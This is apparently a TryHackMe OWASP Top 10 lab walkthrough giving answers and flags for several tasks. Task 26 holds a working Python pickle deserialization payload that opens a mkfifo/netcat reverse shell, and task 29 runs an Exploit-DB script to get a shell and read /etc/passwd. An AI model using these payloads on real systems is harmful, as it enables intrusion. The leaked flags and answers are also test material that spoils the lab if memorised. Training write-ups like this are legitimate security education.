THM - OWASP TOP 10 (Part 1 of 3)
==================================================================
tryhackme.com/room/owasptop10
github.com/ttnovo/OWASP_Part1
by: TTNOVO 
==================================================================
If you use own VM you need to use VPN.

1. Download your VPN file on THM, find it and do: sudo openvpn FILE.ovpn
2. Hit your password and you ready to dive in...

Disclaimer: Never hack anything, that you are not allowed to hack!
==================================================================
TASK 25:

Deploy the machine from task 21

Pretty much you will find exactly what you need in the THM Room.
This is pretty cool how you can change the user cookie to admin and
from that gain access to the flag!

1. First flag (cookie value)
Answer: THM{good_old_base64_huh}

2. Second flag (admin dashboard)
Answer: THM{heres_the_admin_flag}
===================================================================
TASK 26:

Deploy the machine from task 21.

1. Go to /myprofile
2. Press the VIM and than under that the feedback button.

3. nc -nvlp 4100
4. Use Nano to save this in a file, change your local IP by doing an ipaddr.
5. Run it! And update the site, you should have a reverse shell now!
6. To find flag... find / -name flag.txt 2> /dev/null

import pickle
import sys
import base64
command = 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | netcat LOCALIP 4100 > /tmp/f'
class rce(object):
    def __reduce__(self):
        import os
        return (os.system,(command,))
print(base64.b64encode(pickle.dumps(rce())))

1. Flag.txt
Answer: 4a69a7ff9fd68
===================================================================
TASK 29:

Launch the machine!

1. Navigate to website, use information from there to find on Exploit-db.
2. exploit-db.com/exploits/47887
3. python3 47887.py http://IP (to start a reverse shell)
4. wc -c /etc/passwd

1. How many characters are in /etc/passwd?
Answer: 1611
===================================================================
TASK 30:

Download the task file, and read it, its pretty self explainable!

1. What IP address is the attacker using?
Answer: 49.99.13.16

2. What kind of attack is being carried out?
Answer: Brute Force (Google!)
